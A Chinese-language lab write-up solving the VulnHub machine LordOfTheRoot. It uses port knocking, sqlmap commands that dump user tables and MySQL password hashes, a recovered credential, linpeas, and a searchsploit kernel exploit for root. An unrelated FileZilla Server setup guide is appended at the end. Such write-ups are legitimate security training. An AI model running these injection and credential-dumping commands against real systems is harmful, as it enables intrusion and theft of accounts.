vulnhub LordOfTheRoot_1.0.1

总结:端口敲门,CVE-2015-8660提权,

目录

下载地址

漏洞分析

信息收集

端口敲门

网站分析

方法一

ssh登录提权

方法二



下载地址

使用方法:下载以后直接使用vm打开ova文件就可以了。


漏洞分析

信息收集

这里我没有使用我以前常用的方法来获得ip

因为我使用fping没有扫出来,可以看到这两个扫出来的不一样,因为通过以前的方法我们可以排除fping的所有结果,不知道可以看看我别的vulnhub的文章,这里只有192.168.31.152的公司是vm,所以我们靶机的ip就是192.168.31.152

这里我们看看nmap扫出来的东西,居然只有22端口,这里使用-p-重新扫一下。

 

这里还是p都没扫出来,应该是没有了,或者是被防火墙拦住了。

这里我们先看看22端口有没有什么提示,这里提示了一个easy as 1,2,3

这个把说过dc系列,应该可能会想到端口敲门,这里看看。

 

端口敲门

我们使用knock把这三个端口敲一遍

knock 192.168.31.152 3 2 1 -v
或者
nmap -sS 192.168.31.152 -p 1
nmap -sS 192.168.31.152 -p 2
nmap -sS 192.168.31.152 -p 3
这时候使用nmap扫一下还是没有发现什么东西,这里使用-p-还是发现了一些东西,这里得到1337端口,去访问访问看看。

 

网站分析

因为端口敲门使用的kali敲的,所以这里只有kali能访问1337端口,这里只有一张图片,这里我们扫扫目录看看。

 

这里看看images目录中有没有什么提示。

 

有三张图片看看。

果然第一张就是提示了,这里的意思大概是黑色的gate就是最主流的了,这里看看访问访问gate有没有东西

 

这里发现一串疑似base64的字符串,去解密解密看看。

 

ok,这里我们去访问 /978345210/index.php

 

 这里是一个登录框,额,怎么有一种sql注入的感觉,直接f12拦包

 

这里看到就是index.php接受的,然后有三个参数,这里用sqlmap跑一跑。

你可信他前面跑了几个小时,md,淦,服了

sqlmap -u "http://192.168.31.152:1337/978345210/index.php" --data="username=1&password=1&submit=1" --dbs --batch
sqlmap -u "http://192.168.31.152:1337/978345210/index.php" --data="username=1&password=1&submit=1" --dbs --batch -D "Webapp" --tables   
sqlmap -u "http://192.168.31.152:1337/978345210/index.php" --data="username=1&password=1&submit=1" --dbs --batch -D "Webapp" -T "Users" --columns
sqlmap -u "http://192.168.31.152:1337/978345210/index.php" --data="username=1&password=1&submit=1" --dbs --batch -D "Webapp" -T "Users" -C "username,password" --dump

方法一

ssh登录提权

上面会sqlmap的建议还是不要搞了,太慢了浪费时间,经过测试只有这一个可以登录进去=_=

smeagol:MyPreciousR00t

接下来我们本地使用python打开一个临时网站,然后将linpeas.sh上传上来帮我们检测有没有提权的漏洞,这里没有的可以去github上面找。

 这里建议我们使用这两个,看看。

 

这两个都没有成功,但是给了我们一个建议,这里我们使用searchsploit去看看。

这里我们使用第三个看看

结束欧克了,直接是root了

方法二

这里去跑一跑root的密码

 sqlmap -u "http://192.168.31.152:1337/978345210/index.php" --data="username=1&password=1&submit=1" --dbs --batch -D "mysql" -T "user" -C "User,Password" --dump

 

这种一看就知道是md5加密,这里直接找一个解密网站

 

这里应该是可以udf提权的,因为时间不多的原因大家自己研究一下,可以看看GitHub这篇文章
Red-vs-Blue/linux环境下的MySQL UDF提权.md at master · SEC-GO/Red-vs-Blue · GitHub

  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
FileZilla Server 1.0.1 是一个功能强大的FTP服务器软件,用于在计算机或服务器上搭建FTP服务器。以下是关于如何设置FileZilla Server 1.0.1的说明: 1. 下载并安装:首先,从官方网站上下载FileZilla Server 1.0.1的安装程序。然后,运行安装程序并按照提示完成安装过程。 2. 启动软件:安装完成后,启动FileZilla Server 1.0.1。在启动界面上,你会看到"Welcome to the FileZilla Server Installation Wizard"(欢迎使用FileZilla Server安装向导)。 3. 创建管理员帐户:首次运行软件时,你需要创建一个管理员帐户。点击"Next"(下一步),然后在"Server Configuration"(服务器配置)界面上选择"Create a new user called 'admin'"(创建名为 'admin' 的新用户),并输入相应的密码。点击"Next"(下一步)完成管理员帐户的创建。 4. 配置FTP服务器:在"Server Configuration"(服务器配置)界面上,你可以设置FTP服务器的端口、传输模式、加密选项等。根据你的需求进行相应的配置,并点击"Next"(下一步)。 5. 选择默认共享文件夹:在"Shared Folders"(共享文件夹)界面上,你可以选择默认的共享文件夹。你可以点击"Add"(添加)按钮添加需要共享的文件夹,并为每个文件夹指定相应的权限。点击"Next"(下一步)。 6. 配置访问权限:在"User Settings"(用户设置)界面上,你可以为各个用户定义不同的访问权限。点击"Add"(添加)按钮,输入相应的用户名和密码,并为其选择或创建所需的目录权限。点击"Next"(下一步)。 7. 完成设置:在"Groups"(组)界面上,你可以创建用户组,并将用户分配到相应的组中。然后,点击"Next"(下一步)。 8. 确认设置:在"Confirmation"(确认)界面上,你可以查看并确认所做的设置。如果一切都正确,点击"Install"(安装)按钮开始安装。 9. 完成安装:安装完成后,点击"Done"(完成)按钮退出安装向导。你的FTP服务器已经成功设置和安装。 请注意,以上只是基本设置过程的概述。根据你的具体需求,你还可以进一步配置和调整FileZilla Server 1.0.1以满足你的要求。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

练习两年半的篮球选..哦不对安全选手

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值